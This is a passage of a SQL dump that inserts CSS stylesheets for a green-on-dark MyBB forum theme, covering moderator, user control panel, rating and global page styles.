bold;\n}\n\n.modqueue_controls label {\n margin-right: 8px;\n}\n\n.label_radio_ignore, .label_radio_delete, .label_radio_approve {\n font-weight: bold;\n}\n\n.modqueue_meta {\n color: #444;\n font-size: 95%;\n margin-bottom: 8px;\n}\n\n.modqueue_mass {\n list-style: none;\n margin: 0;\n width: 150px;\n padding: 0;\n}\n\n.modqueue_mass li {\n margin-bottom: 4px;\n padding: 0;\n}\n\n.modqueue_mass li a {\n display: block;\n padding: 4px;\n border: 1px solid transparent;\n}\n\n.modqueue_mass li a:hover {\n background: #efefef;\n border: 1px solid #ccc;\n text-decoration: none;\n}', 'modcp.css', '1340045122'); INSERT INTO mybb_themestylesheets VALUES('4', 'star_ratings.css', '1', 'forumdisplay.php|showthread.php', '.star_rating,\n.star_rating li a:hover,\n.star_rating .current_rating {\n background: url(images/star_rating.gif) left -1000px repeat-x;\n vertical-align: middle;\n}\n\n.star_rating {\n position: relative;\n width:80px;\n height:16px;\n overflow: hidden;\n list-style: none;\n margin: 0;\n padding: 0;\n background-position: left top;\n}\n\ntd .star_rating {\n margin: auto;\n}\n\n.star_rating li {\n display: inline;\n}\n\n.star_rating li a,\n.star_rating .current_rating {\n position: absolute;\n text-indent: -1000px;\n height: 16px;\n line-height: 16px;\n outline: none;\n overflow: hidden;\n border: none;\n top:0;\n left:0;\n}\n\n.star_rating_notrated li a:hover {\n background-position: left bottom;\n}\n\n.star_rating li a.one_star {\n width:20%;\n z-index:6;\n}\n\n.star_rating li a.two_stars {\n width:40%;\n z-index:5;\n}\n\n.star_rating li a.three_stars {\n width:60%;\n z-index:4;\n}\n\n.star_rating li a.four_stars {\n width:80%;\n z-index:3;\n}\n\n.star_rating li a.five_stars {\n width:100%;\n z-index:2;\n}\n\n.star_rating .current_rating {\n z-index:1;\n background-position: left center;\n}\n\n.star_rating_success, .success_message {\n color: #00b200;\n font-weight: bold;\n font-size: 10px;\n margin-bottom: 10px;\n}\n\n.inline_rating {\n float: left;\n vertical-align: middle;\n padding-right: 5px;\n}', 'star_ratings.css', '1340076878'); INSERT INTO mybb_themestylesheets VALUES('5', 'showthread.css', '1', 'showthread.php', 'ul.thread_tools, ul.thread_tools li {\n list-style: none;\n padding: 0;\n margin: 0;\n}\n\nul.thread_tools li {\n padding-left: 26px;\n padding-bottom: 4px;\n margin-bottom: 3px;\n font-size: 11px;\n}\n\nul.thread_tools li.printable {\n background: url(images/printable.gif) no-repeat 0px 0px;\n}\n\nul.thread_tools li.sendthread {\n background: url(images/send.gif) no-repeat 0px 0px;\n}\n\nul.thread_tools li.subscription_add {\n background: url(images/subscribe.gif) no-repeat 0px 0px;\n}\n\nul.thread_tools li.subscription_remove {\n background: url(images/unsubscribe.gif) no-repeat 0px 0px;\n}', 'showthread.css', '1340045122'); INSERT INTO mybb_themestylesheets VALUES('25', 'tabbed.css', '1', 'index.php', '.shadetabs{\r\npadding: 3px 0;\r\nmargin-left: 0;\r\nmargin-top: 1px;\r\nmargin-bottom: 0;\r\nfont: bold 12px Verdana;\r\nlist-style-type: none;\r\ntext-align: left; /*set to left, center, or right to align the menu as desired*/\r\n}\r\n\r\n.shadetabs li{\r\ndisplay: inline;\r\nmargin: 0;\r\n}\r\n\r\n.shadetabs li a{\r\ntext-decoration: none;\r\nposition: relative;\r\nz-index: 1;\r\npadding: 3px 7px;\r\nmargin-right: 3px;\r\nborder: 1px solid #778;\r\ncolor: #ffffff;\r\nbackground: white url(images/thead_bg.gif) top left repeat-x;\r\n}\r\n\r\n.shadetabs li a:hover{\r\ntext-decoration: underline;\r\n}\r\n\r\n.shadetabs li a.selected{ /*selected main tab style */\r\nposition: relative;\r\ntop: 1px;\r\n}\r\n\r\n.shadetabs li a.selected{ /*selected main tab style */\r\nbackground:#ADCBE7;\r\ncolor: #000000;\r\nborder-bottom-color: #81A2C4;\r\n}\r\n\r\n.shadetabs li a.selected:hover{ /*selected main tab style */\r\ntext-decoration: none;\r\n}\r\n\r\n.tabcontent{\r\ndisplay:none;\r\n}\r\n\r\n@media print {\r\n.tabcontent {\r\ndisplay:block !important;\r\n}\r\n}\r\n', 'tabbed.css', '1340045122'); INSERT INTO mybb_themestylesheets VALUES('30', 'global.css', '10', '', 'body {\r\n background: #1e1e1e url(images/CoderGreen/bg1.png) repeat;\r\n color: #000;\r\n text-align: center;\r\n line-height: 1.4;\r\n margin: 0;\r\n background-attachment: fixed;\r\n \r\n font-family: Verdana, Arial, Sans-Serif;\r\n font-size: 13px;\r\n}\r\n\r\na:link {\r\n color: #539e01;\r\n text-decoration: none;\r\n}\r\n\r\na:visited {\r\n color: #539e01;\r\n text-decoration: none;\r\n}\r\n\r\na:hover, a:active {\r\n color: #539e01;\r\n text-decoration: underline;\r\n}\r\n\r\n#container {\r\n background: #212121;\r\n width: 91%;\r\n color: #707070;\r\n border: 3px solid #00AB09;\r\n margin: auto auto;\r\n padding: 0 15px 15px;\r\n text-align: left;\r\n text-shadow: 1px 1px #000;\r\n}\r\n\r\n#header {\r\n background: #222222 url(images/CoderGreen/header.png) bottom repeat-x;\r\n border: 1px solid #353434;\r\n padding: 0 8px 0;\r\n -moz-border-radius-bottomleft: 5px;\r\n -webkit-border-bottom-left-radius: 5px;\r\n border-bottom-left-radius: 5px;\r\n -moz-border-radius-bottomright: 5px;\r\n -webkit-border-bottom-right-radius: 5px;\r\n border-bottom-right-radius: 5px;\r\n overflow: hidden;\r\n -moz-box-shadow: 0px 0px 1px #000;\r\n -webkit-box-shadow: 0px 0px 1px #000;\r\n box-shadow: 0px 0px 1px #000;\r\n}\r\n\r\n#content {\r\n /* FIX: Make internet explorer wrap correctly */\r\n width: auto !important;\r\n}\r\n\r\n.menu ul {\r\n color: #000000;\r\n font-weight: bold;\r\n text-align: right;\r\n padding: 4px;\r\n}\r\n\r\n.menu ul a:link {\r\n color: #000000;\r\n text-decoration: none;\r\n}\r\n\r\n.menu ul a:visited {\r\n color: #000000;\r\n text-decoration: none;\r\n}\r\n\r\n.menu ul a:hover, .menu ul a:active {\r\n color: #222;\r\n text-decoration: none;\r\n}\r\n\r\n#panel {\r\n background: #549f01 url(images/CoderGreen/panel.png);\r\n color: #cccccc;\r\n border: 1px solid #6D6D6D;\r\n padding: 6px;\r\n \r\n font-size: 11px;\r\n}\r\n\r\ntable {\r\n color: #fff;\r\n text-shadow:1px 1px #000;\r\n font-family: Verdana, Arial, Sans-Serif;\r\n font-size: 13px;\r\n}\r\n\r\n.tborder {\r\n width: 100%;\r\n margin: auto auto;\r\n border: 1px solid #373737;\r\n border-width: 0px 1px 1px;\r\n -webkit-box-shadow: 0px 0px 5px #bbb;\r\n -moz-box-shadow: 0px 0px 5px #bbb;\r\n -ms-box-shadow: 0px 0px 5px #bbb;\r\n -o-box-shadow: 0px 0px 5px #bbb;\r\n box-shadow: 0px 0px 5px #bbb;\r\n}\r\n\r\n.tborder1 {\r\n width: 100%;\r\n margin: auto auto;\r\n border: 1px solid #373737;\r\n border-width: 0px 1px 1px;\r\n}\r\n\r\n.thead {\r\n background: #437c01 url(images/CoderGreen/thead.png) repeat-x;;\r\n color: #000;\r\n border: 1px solid #181818;\r\n border-width:1px 0 1px 0;\r\n text-shadow: 0 -1px #74ad34;\r\n padding: 4px;\r\n -moz-border-radius-topleft: 5px;\r\n -webkit-border-top-left-radius: 5px;\r\n border-top-left-radius: 5px;\r\n -moz-border-radius-topright: 5px;\r\n -webkit-border-top-right-radius: 5px;\r\n border-top-right-radius: 5px;\r\n position: relative;\r\n line-height: 23px;\r\n}\r\n\r\n.thead a:link {\r\n color: #000;\r\n text-decoration: none;\r\n}\r\n\r\n.thead a:visited {\r\n color: #000;\r\n text-decoration: none;\r\n}\r\n\r\n.thead a:hover, .thead a:active {\r\n color: #000;\r\n text-decoration: underline;\r\n}\r\n\r\n.tcat {\r\n background: #2b2b2b url(images/CoderGreen/tcat.png) repeat-x;\r\n color: #707070;\r\n border: 1px solid #171717;\r\n border-right-color: #373737;\r\n border-top-color: #373737;\r\n text-shadow: 0 -1px #000;\r\n \r\n font-size: 12px;\r\n}\r\n\r\n.tcat a:link {\r\n color: #707070;\r\n}\r\n\r\n.tcat a:visited {\r\n color: #707070;\r\n}\r\n\r\n.tcat a:hover, .tcat a:active {\r\n color: #fff;\r\n}\r\n\r\n.tcat:last-child, .trow1:last-child, .trow2:last-child {\r\n border-right-color:#171717;\r\n}\r\n\r\n.trow1 {\r\n background: #212121 url(images/CoderGreen/trow.png) repeat-x;\r\n border: 1px solid #171717;\r\n border-right-color: #373737;\r\n border-top-color: #373737;\r\n}\r\n\r\n.trow2 {\r\n background: #212121 url(images/CoderGreen/trow.png) repeat-x;\r\n border: 1px solid #171717;\r\n border-right-color: #373737;\r\n border-top-color: #373737;\r\n}\r\n\r\n.trow_shaded {\r\n background: #ffdde0;\r\n}\r\n\r\n.trow_selected td {\r\n background: #FFFBD9;\r\n}\r\n\r\n.trow_sep {\r\n background: #212121;\r\n color: #fff;\r\n border: 1px solid #171717;\r\n border-top-color: #373737;\r\n \r\n font-size: 12px;\r\n font-weight: bold;\r\n}\r\n\r\n.tfoot {\r\n background: #56a301 url(images/CoderGreen/tfoot.png) repeat-x;\r\n color: #000;\r\n border: 1px solid #181818;\r\n border-top: none;\r\n text-shadow: 0 -1px #74ad34;\r\n}\r\n\r\n.tfoot a:link {\r\n color: #000;\r\n text-decoration: none;\r\n}\r\n\r\n.tfoot a:visited {\r\n color: #000;\r\n text-decoration: none;\r\n}\r\n\r\n.tfoot a:hover, .tfoot a:active {\r\n color: #000;\r\n text-decoration: underline;\r\n}\r\n\r\n.bottommenu {\r\n background: #212121 url(images/CoderGreen/header.png) repeat-x;\r\n color: #707070;\r\n border: 1px solid #111;\r\n border-top-color: #373737;\r\n padding: 8px;\r\n -moz-border-radius: 5px;\r\n -webkit-border-radius: 5px;\r\n border-radius: 5px;\r\n text-shadow:0 -1px #000;\r\n font-size: 11px;\r\n}\r\n\r\n.navigation {\r\n background: #212121 url(images/CoderGreen/trow.png) repeat-x;\r\n color: #707070;\r\n text-shadow: 1px 1px #000;\r\n border: 1px solid #373737;\r\n padding: 4px;\r\n -moz-border-radius: 5px;\r\n -webkit-border-radius: 5px;\r\n border-radius: 5px;\r\n -moz-box-shadow: 0px 0px 1px #000;\r\n -webkit-box-shadow: 0px 0px 1px #000;\r\n box-shadow: 0px 0px 1px #000;\r\n font-size: 13px;\r\n font-weight: bold;\r\n}\r\n\r\n.navigation a:link {\r\n color: #707070;\r\n text-decoration: none;\r\n}\r\n\r\n.navigation a:visited {\r\n color: #707070;\r\n text-decoration: none;\r\n}\r\n\r\n.navigation a:hover, .navigation a:active {\r\n color: #707070;\r\n text-decoration: none;\r\n}\r\n\r\n.navigation .active {\r\n color: #4a8805;\r\n font-size: small;\r\n font-weight: bold;\r\n}\r\n\r\n.smalltext {\r\n font-size: 11px;\r\n}\r\n\r\n.largetext {\r\n font-size: 16px;\r\n font-weight: bold;\r\n}\r\n\r\n.editor {\r\n background: #f1f1f1;\r\n border: 1px solid #ccc;\r\n}\r\n\r\n.editor_control_bar {\r\n background: #fff;\r\n border: 1px solid #0f5c8e;\r\n}\r\n\r\n.autocomplete {\r\n background: #fff;\r\n border: 1px solid #000;\r\n color: black;\r\n}\r\n\r\n.autocomplete_selected {\r\n background: #adcee7;\r\n color: #000;\r\n}\r\n\r\n.popup_menu {\r\n background: #ccc;\r\n border: 1px solid #000;\r\n}\r\n\r\n.popup_menu .popup_item {\r\n background: #fff;\r\n color: #000;\r\n}\r\n\r\n.popup_menu .popup_item:hover {\r\n background: #C7DBEE;\r\n color: #000;\r\n}\r\n\r\n.trow_reputation_positive {\r\n background: #43FF43;\r\n}\r\n\r\n.trow_reputation_negative {\r\n background: #FF5F5F;\r\n}\r\n\r\n.reputation_positive {\r\n color: green;\r\n}\r\n\r\n.reputation_neutral {\r\n color: #444;\r\n}\r\n\r\n.reputation_negative {\r\n color: red;\r\n}\r\n\r\n.invalid_field {\r\n border: 1px solid #f30;\r\n color: #f30;\r\n}\r\n\r\n.valid_field {\r\n border: 1px solid #0c0;\r\n}\r\n\r\n.validation_error {\r\n background: url(images/invalid.gif) no-repeat center left;\r\n color: #f30;\r\n margin: 5px 0;\r\n padding: 5px;\r\n font-weight: bold;\r\n font-size: 11px;\r\n padding-left: 22px;\r\n}\r\n\r\n.validation_success {\r\n background: url(images/valid.gif) no-repeat center left;\r\n color: #00b200;\r\n margin: 5px 0;\r\n padding: 5px;\r\n font-weight: bold;\r\n font-size: 11px;\r\n padding-left: 22px;\r\n}\r\n\r\n.validation_loading {\r\n background: url(images/spinner.gif) no-repeat center left;\r\n color: #555;\r\n margin: 5px 0;\r\n padding: 5px;\r\n font-weight: bold;\r\n font-size: 11px;\r\n padding-left: 22px;\r\n}\r\n\r\n/* Additional CSS (Master) */\r\nimg {\r\n border: none;\r\n}\r\n\r\n.clear {\r\n clear: both;\r\n}\r\n\r\n.hidden {\r\n display: none;\r\n float: none;\r\n width: 1%;\r\n}\r\n\r\n.hiddenrow {\r\n display: none;\r\n}\r\n\r\n.selectall {\r\n background-color: #FFFBD9;\r\n font-weight: bold;\r\n text-align: center;\r\n}\r\n\r\n.float_left {\r\n float: left;\r\n}\r\n\r\n.float_right {\r\n float: right;\r\n}\r\n\r\n.menu ul {\r\n list-style: none;\r\n margin: 0;\r\n}\r\n\r\n.menu li {\r\n background: #437c01 url(images/CoderGreen/thead.png) repeat-x;\r\n border: 1px solid #181818;\r\n text-shadow: 0 -1px #74ad34;\r\n padding: 8px;\r\n -moz-border-radius-bottomleft: 5px;\r\n -webkit-border-bottom-left-radius: 5px;\r\n border-bottom-left-radius: 5px;\r\n -moz-border-radius-bottomright: 5px;\r\n -webkit-border-bottom-right-radius: 5px;\r\n border-bottom-right-radius: 5px;\r\n display: inline;\r\n}\r\n\r\n.menu img {\r\n padding-right: 5px;\r\n vertical-align: top;\r\n}\r\n\r\n#panel .links {\r\n color: #ffffff;\r\n margin: 0;\r\n float: right;\r\n}\r\n\r\n.expcolimage {\r\n width: auto;\r\n float: right;\r\n}\r\n\r\nimg.attachment {\r\n border: 1px solid #E9E5D7;\r\n padding: 2px;\r\n}\r\n\r\nhr {\r\n background-color: #000000;\r\n color: #000000;\r\n height: 1px;\r\n border: 0px;\r\n}\r\n\r\n#copyright {\r\n font: 11px Verdana, Arial, Sans-Serif;\r\n margin: 0;\r\n padding: 10px 0 0 0;\r\n}\r\n\r\n#debug {\r\n float: right;\r\n text-align: right;\r\n margin-top: 0;\r\n}\r\n\r\nblockquote {\r\n border: 1px solid #fff;\r\n margin: 0;\r\n color: #000;\r\n background: #A4A4A4;\r\n padding: 4px;\r\n}\r\n\r\nblockquote cite {\r\n font-weight: underline;\r\n border-bottom: 1px solid #ccc;\r\n font-style: normal;\r\n display: block;\r\n margin: 4px 0;\r\n}\r\n\r\nblockquote cite span {\r\n float: right;\r\n font-weight: normal;\r\n}\r\n\r\nblockquote cite span.highlight {\r\n float: none;\r\n font-weight: bold;\r\n padding-bottom: 0;\r\n}\r\n\r\n.codeblock {\r\n background: #A4A4A4;\r\n color: #000;\r\n border: 1px solid #ccc;\r\n padding: 4px;\r\n}\r\n\r\n.codeblock .title {\r\n border-bottom: 1px solid #ccc;\r\n font-weight: bold;\r\n margin: 4px 0;\r\n}\r\n\r\n.codeblock code {\r\n overflow: auto;\r\n height: auto;\r\n max-height: 200px;\r\n display: block;\r\n font-family: Monaco, Consolas, Courier, monospace;\r\n font-size: 13px;\r\n}\r\n\r\n.subforumicon {\r\n border: 0;\r\n vertical-align: middle;\r\n}\r\n\r\n.separator {\r\n margin: 5px;\r\n padding: 0;\r\n height: 0px;\r\n font-size: 1px;\r\n list-style-type: none;\r\n}\r\n\r\nform {\r\n margin: 0;\r\n padding: 0;\r\n}\r\n\r\n.popup_menu .popup_item_container {\r\n margin: 1px;\r\n text-align: left;\r\n}\r\n\r\n.popup_menu .popup_item {\r\n display: block;\r\n padding: 3px;\r\n text-decoration: none;\r\n white-space: nowrap;\r\n}\r\n\r\n.popup_menu a.popup_item:hover {\r\n text-decoration: none;\r\n}\r\n\r\n.autocomplete {\r\n text-align: left;\r\n}\r\n\r\n.subject_new {\r\n font-weight: bold;\r\n}\r\n\r\n.highlight {\r\n background: #FFFFCC;\r\n padding-top: 3px;\r\n padding-bottom: 3px;\r\n}\r\n\r\n.pm_alert div {\r\n background: #212121 url(images/CoderGreen/trow.png) repeat-x;\r\n color: #707070;\r\n border: 1px solid #373737;\r\n text-align: center;\r\n padding: 5px 20px;\r\n -moz-border-radius: 5px;\r\n -webkit-border-radius: 5px;\r\n border-radius: 5px;\r\n font-size: 11px;\r\n}\r\n\r\n.pm_alert .float_right {\r\n background: none;\r\n border: none;\r\n}\r\n\r\n.pm_alert {\r\n border: 1px solid #171717;\r\n -moz-border-radius: 5px;\r\n -webkit-border-radius: 5px;\r\n border-radius: 5px;\r\n margin: 0;\r\n padding: 0;\r\n}\r\n\r\n.red_alert {\r\n background: #FBE3E4;\r\n border: 1px solid #A5161A;\r\n color: #A5161A;\r\n text-align: center;\r\n padding: 5px 20px;\r\n margin-bottom: 15px;\r\n font-size: 11px;\r\n}\r\n\r\n.high_warning {\r\n color: #CC0000;\r\n}\r\n\r\n.moderate_warning {\r\n color: #F3611B;\r\n}\r\n\r\n.low_warning {\r\n color: #AE5700;\r\n}\r\n\r\ndiv.error {\r\n padding: 5px 10px;\r\n border-top: 2px solid #FFD324;\r\n border-bottom: 2px solid #FFD324;\r\n background: #FFF6BF;\r\n font-size: 12px;\r\n}\r\n\r\ndiv.error p {\r\n margin: 0;\r\n color: #000;\r\n font-weight: normal;\r\n}\r\n\r\ndiv.error p em {\r\n font-style: normal;\r\n font-weight: bold;\r\n padding-left: 24px;\r\n display: block;\r\n color: #C00;\r\n background: url(images/error.gif) no-repeat 0;\r\n}\r\n\r\ndiv.error.ul {\r\n margin-left: 24px;\r\n}\r\n\r\n.online {\r\n color: #15A018;\r\n}\r\n\r\n.offline {\r\n color: #C7C7C7;\r\n}\r\n\r\n.pagination {\r\n font-size: 11px;\r\n padding-top: 10px;\r\n margin-bottom: 5px;\r\n}\r\n\r\n.tfoot .pagination, .tcat .pagination {\r\n padding-top: 0;\r\n}\r\n\r\n.pagination .pages {\r\n font-weight: bold;\r\n}\r\n\r\n.pagination .pagination_current, .pagination a {\r\n padding: 2px 6px;\r\n margin-bottom: 3px;\r\n}\r\n\r\n.pagination a {\r\n border: 1px solid #000000;\r\n}\r\n\r\n.pagination .pagination_current {\r\n background: #00B503;\r\n color: #ffffff;\r\n border: 1px solid #000000;\r\n \r\n font-weight: bold;\r\n}\r\n\r\n.pagination a:hover {\r\n background: #02B717;\r\n color: #ffffff;\r\n text-decoration: none;\r\n}\r\n\r\n.thread_legend, .thread_legend dd {\r\n margin: 0;\r\n padding: 0;\r\n}\r\n\r\n.thread_legend dd {\r\n padding-bottom: 4px;\r\n margin-right: 15px;\r\n}\r\n\r\n.thread_legend img {\r\n margin-right: 4px;\r\n vertical-align: bottom;\r\n}\r\n\r\n.forum_legend, .forum_legend dt, .forum_legend dd {\r\n margin: 0;\r\n padding: 0;\r\n line-height: 45px;\r\n}\r\n\r\n.forum_legend dd {\r\n float: left;\r\n margin-right: 10px;\r\n}\r\n\r\n.forum_legend dt {\r\n margin-right: 10px;\r\n float: left;\r\n}\r\n\r\n.success_message {\r\n color: #00b200;\r\n font-weight: bold;\r\n font-size: 10px;\r\n margin-bottom: 10px;\r\n}\r\n\r\n.error_message {\r\n color: #C00;\r\n font-weight: bold;\r\n font-size: 10px;\r\n margin-bottom: 10px;\r\n}\r\n\r\n.post_body {\r\n padding: 5px;\r\n}\r\n\r\n.post_content {\r\n padding: 5px 10px;\r\n}\r\n\r\n.quick_jump {\r\n background: url(images/jump.gif) no-repeat 0;\r\n width: 13px;\r\n height: 13px;\r\n padding-left: 13px; /* amount of padding needed for image to fully show */\r\n vertical-align: middle;\r\n border: none;\r\n}\r\n\r\n.repbox {\r\n font-size:16px;\r\n font-weight: bold;\r\n padding:5px 7px 5px 7px;\r\n}\r\n\r\n._neutral {\r\n background-color:#FAFAFA;\r\n color: #999999;\r\n border:1px solid #CCCCCC;\r\n}\r\n\r\n._minus {\r\n background-color: #FDD2D1;\r\n color: #CB0200;\r\n border:1px solid #980201;\r\n}\r\n\r\n._plus {\r\n background-color:#E8FCDC;\r\n color: #008800;\r\n border:1px solid #008800;\r\n}\r\n\r\n.pagination_breadcrumb {\r\n background-color: #109A13;\r\n border: 1px solid #fff;\r\n outline: 1px solid #ccc;\r\n padding: 5px;\r\n margin-top: 5px;\r\n \r\n font-weight: normal;\r\n}\r\n\r\n.pagination_breadcrumb_link {\r\n vertical-align: middle;\r\n cursor: pointer;\r\n}\r\n\r\n.logo {\r\n text-align: center;\r\n}\r\n\r\ninput[type=submit], input[type=button] {\r\n background: #437c01 url(images/CoderGreen/thead.png) repeat-x;\r\n color: #000;\r\n border: none;\r\n text-shadow: 0 -1px #74ad34;\r\n padding: 4px;\r\n -moz-border-radius: 5px;\r\n -webkit-border-radius: 5px;\r\n border-radius: 5px;\r\n position: relative;\r\n cursor: pointer;\r\n font-weight: bold;\r\n}\r\n\r\n.tfoot input[type=submit], .tfoot input[type=button] {\r\n border: 1px solid #181818;\r\n}\r\n\r\ntextarea {\r\n background: #2b2b2b url(images/CoderGreen/tcat.png) repeat-x;\r\n color: #FFFFFF;\r\n border: 1px solid #373737;\r\n text-shadow: 0 -1px #000;\r\n padding: 4px;\r\n margin: 1px;\r\n outline: 1px solid #171717;\r\n font-size: 13px;\r\n}\r\n\r\ntable select, table input.textbox, #header input.textbox, .bottommenu select {\r\n outline: 1px solid #171717;\r\n}\r\n\r\nselect, input.textbox {\r\n background: #2b2b2b url(images/CoderGreen/tcat.png) repeat-x;\r\n color: #707070;\r\n border: 1px solid #373737;\r\n text-shadow: 0 -1px #000;\r\n padding: 4px;\r\n margin: 1px;\r\n outline: 1px solid #000;\r\n}\r\n\r\n#lang_select {\r\n position: relative;\r\n top: -7px;\r\n}\r\n\r\n.logo {\r\ntext-align:center;\r\n}\r\n\r\n.postbit {\r\n -moz-box-shadow:inset 0px 0px 0px -2px #000000;\r\n -webkit-box-shadow:inset 0px 0px 0px -2px #000000;\r\n box-shadow:inset 0px 0px 0px -2px #000000;\r\n background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #363536), color-stop(1, #080808) );\r\n background:-moz-linear-gradient( center top, #363536 5%, #080808 100% );\r\n filter:progid:DXImageTransform.Microsoft.gradient(startColorstr=\'#363536\', endColorstr=\'#080808\');\r\n background-color:#363536;\r\n -moz-border-radius:42px;\r\n -webkit-border-radius:42px;\r\n border-radius:42px;\r\n border:1px solid #000000;\r\n display:inline-block;\r\n color:#1ee300;\r\n font-family:arial;\r\n font-size:13px;\r\n font-weight:bold;\r\n padding:2px 14px;\r\n text-decoration:none;\r\n text-shadow:0px 1px 0px #00c200;\r\n}\r\n\r\n.postbit:hover {\r\n background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #080808), color-stop(1, #363536) );\r\n background:-moz-linear-gradient( center top, #080808 5%, #363536 100% );\r\n filter:progid:DXImageTransform.Microsoft.gradient(startColorstr=\'#080808\', endColorstr=\'#363536\');\r\n background-color:#080808;\r\n}\r\n\r\n.postbit:active {\r\n position:relative;\r\n top:1px;\r\n}\r\n\r\n/* ADMIN / MOD NOTICE */\r\n.mod_bb {\r\n background:#000000;\r\n color:#FF0000;\r\n padding:.8em;\r\n margin-bottom:1.6em;\r\n border:2px solid #B40404;\r\n}\r\n\r\n.mod_bb img {\r\n position:relative;\r\n top:2px;\r\n}\r\n\r\n.post_body a:link {\r\n color: #2E64FE;\r\n text-decoration: none;\r\n}\r\n\r\n.post_body a:visited {\r\n color: #A4A4A4;\r\n text-decoration: none;\r\n}\r\n\r\n.post_body a:hover, .post_body a:active {\r\n color: #0040FF;\r\n text-decoration: underline;\r\n}\r\n', 'global.css', '1351041610'); INSERT INTO mybb_themestylesheets VALUES('31', 'usercp.css', '10', 'usercp.php|usercp2.php|private.php', '.usercp_nav_item {\r\n display: block;\r\n padding: 1px 0 1px 23px;\r\n}\r\n\r\n.usercp_nav_composepm {\r\n background: url(images/CoderGreen/usercp/composepm.gif) no-repeat left center;\r\n}\r\n\r\n.usercp_nav_pmfolder {\r\n background: url(images/CoderGreen/usercp/pmfolder.gif) no-repeat left center;\r\n}\r\n\r\n.usercp_nav_sub_pmfolder {\r\n background: url(images/CoderGreen/usercp/sub_pmfolder.gif) no-repeat left center;\r\n padding-left: 40px;\r\n}\r\n\r\n.usercp_nav_trash_pmfolder {\r\n background: url(images/CoderGreen/usercp/trash_pmfolder.gif) no-repeat left center;\r\n padding-left: 40px;\r\n}\r\n\r\n.usercp_nav_pmtracking {\r\n background: url(images/CoderGreen/usercp/pmtracking.gif) no-repeat left center;\r\n}\r\n\r\n.usercp_nav_pmfolders {\r\n background: url(images/CoderGreen/usercp/editfolders.gif) no-repeat left center;\r\n}\r\n\r\n.usercp_nav_profile {\r\n background: url(images/CoderGreen/usercp/profile.gif) no-repeat left center;\r\n}\r\n\r\n.usercp_nav_email {\r\n background: url(images/CoderGreen/usercp/email.gif) no-repeat left center;\r\n padding-left: 40px;\r\n}\r\n\r\n.usercp_nav_password {\r\n background: url(images/CoderGreen/usercp/password.gif) no-repeat left center;\r\n padding-left: 40px;\r\n}\r\n\r\n.usercp_nav_username {\r\n background: url(images/CoderGreen/usercp/username.gif) no-repeat left center;\r\n padding-left: 40px;\r\n}\r\n\r\n.usercp_nav_editsig {\r\n background: url(images/CoderGreen/usercp/editsig.gif) no-repeat left center;\r\n padding-left: 40px;\r\n}\r\n\r\n.usercp_nav_avatar {\r\n background: url(images/CoderGreen/usercp/avatar.gif) no-repeat left center;\r\n padding-left: 40px;\r\n}\r\n\r\n.usercp_nav_options {\r\n background: url(images/CoderGreen/usercp/options.gif) no-repeat left center;\r\n}\r\n\r\n.usercp_nav_usergroups {\r\n background: url(images/CoderGreen/usercp/usergroups.gif) no-repeat left center;\r\n}\r\n\r\n.usercp_nav_editlists {\r\n background: url(images/CoderGreen/usercp/editlists.gif) no-repeat left center;\r\n}\r\n\r\n.usercp_nav_attachments {\r\n background: url(images/CoderGreen/usercp/attachments.gif) no-repeat left center;\r\n}\r\n\r\n.usercp_nav_drafts {\r\n background: url(images/CoderGreen/usercp/drafts.gif) no-repeat left center;\r\n}\r\n\r\n.usercp_nav_subscriptions {\r\n background: url(images/CoderGreen/usercp/subscriptions.gif) no-repeat left center;\r\n}\r\n\r\n.usercp_nav_fsubscriptions {\r\n background: url(images/CoderGreen/usercp/fsubscriptions.gif) no-repeat left center;\r\n}\r\n\r\n.usercp_nav_notepad {\r\n background: url(images/CoderGreen/usercp/notepad.gif) no-repeat left center;\r\n}\r\n\r\n.usercp_nav_viewprofile {\r\n background: url(images/CoderGreen/usercp/viewprofile.gif) no-repeat left center;\r\n}\r\n\r\n.usercp_nav_home {\r\n background: url(images/CoderGreen/usercp/home.gif) no-repeat left center;\r\n}\r\n\r\n.usercp_notepad {\r\n width: 99%;\r\n}\r\n\r\n.usercp_container {\r\n margin: 5px;\r\n padding: 8px;\r\n border:1px solid #CCCCCC;\r\n}\r\n\r\n.usercp_nav_profile {\r\n background: url(images/CoderGreen/usercp/profile.gif) no-repeat left center;\r\n}\r\n ', 'usercp.css', '1344112598'); INSERT INTO mybb_themestylesheets VALUES('32', 'modcp.css', '10', 'modcp.php', '\n.modcp_nav_item {\n display: block;\n padding: 1px 0 1px 23px;\n}\n\n.modcp_nav_home {\n background: url(images/CoderGreen/modcp/home.gif) no-repeat left center;\n}\n\n.modcp_nav_announcements {\n background: url(images/CoderGreen/modcp/announcements.gif) no-repeat left center;\n}\n\n.modcp_nav_reports {\n background: url(images/CoderGreen/modcp/reports.gif) no-repeat left center;\n}\n\n.modcp_nav_modqueue {\n background: url(images/CoderGreen/modcp/modqueue.gif) no-repeat left center;\n}\n\n.modcp_nav_modlogs {\n background: url(images/CoderGreen/modcp/modlogs.gif) no-repeat left center;\n}\n\n.modcp_nav_editprofile {\n background: url(images/CoderGreen/modcp/editprofile.gif) no-repeat left center;\n}\n\n.modcp_nav_banning {\n background: url(images/CoderGreen/modcp/banning.gif) no-repeat left center;\n}\n\n.modcp_nav_warninglogs {\n background: url(images/CoderGreen/modcp/warninglogs.gif) no-repeat left center;\n}\n\n.modcp_nav_ipsearch {\n background: url(images/CoderGreen/modcp/ipsearch.gif) no-repeat left center;\n}\n\n.modqueue_message {\n overflow: auto;\n max-height: 250px;\n}\n\n.modqueue_controls {\n width: 270px;\n float: right;\n text-align: center;\n border: 1px solid #ccc;\n background: #fff;\n padding: 6px;\n font-weight: bold;\n}\n\n.modqueue_controls label {\n margin-right: 8px;\n}\n\n.label_radio_ignore, .label_radio_delete, .label_radio_approve {\n font-weight: bold;\n}\n\n.modqueue_meta {\n color: #444;\n font-size: 95%;\n margin-bottom: 8px;\n}\n\n.modqueue_mass {\n list-style: none;\n margin: 0;\n width: 150px;\n padding: 0;\n}\n\n.modqueue_mass li {\n margin-bottom: 4px;\n padding: 0;\n}\n\n.modqueue_mass li a {\n display: block;\n padding: 4px;\n border: 1px solid transparent;\n}\n\n.modqueue_mass li a:hover {\n background: #efefef;\n border: 1px solid #ccc;\n text-decoration: none;\n}\n\n\n ', 'modcp.css', '1343925064'); INSERT INTO mybb_themestylesheets VALUES('33', 'star_ratings.css', '10', 'forumdisplay.php|showthread.php', '\n.star_rating,\n.star_rating li a:hover,\n.star_rating .current_rating {\n background: url(images/CoderGreen/star_rating.gif) left -1000px repeat-x;\n vertical-align: middle;\n}\n\n.star_rating {\n 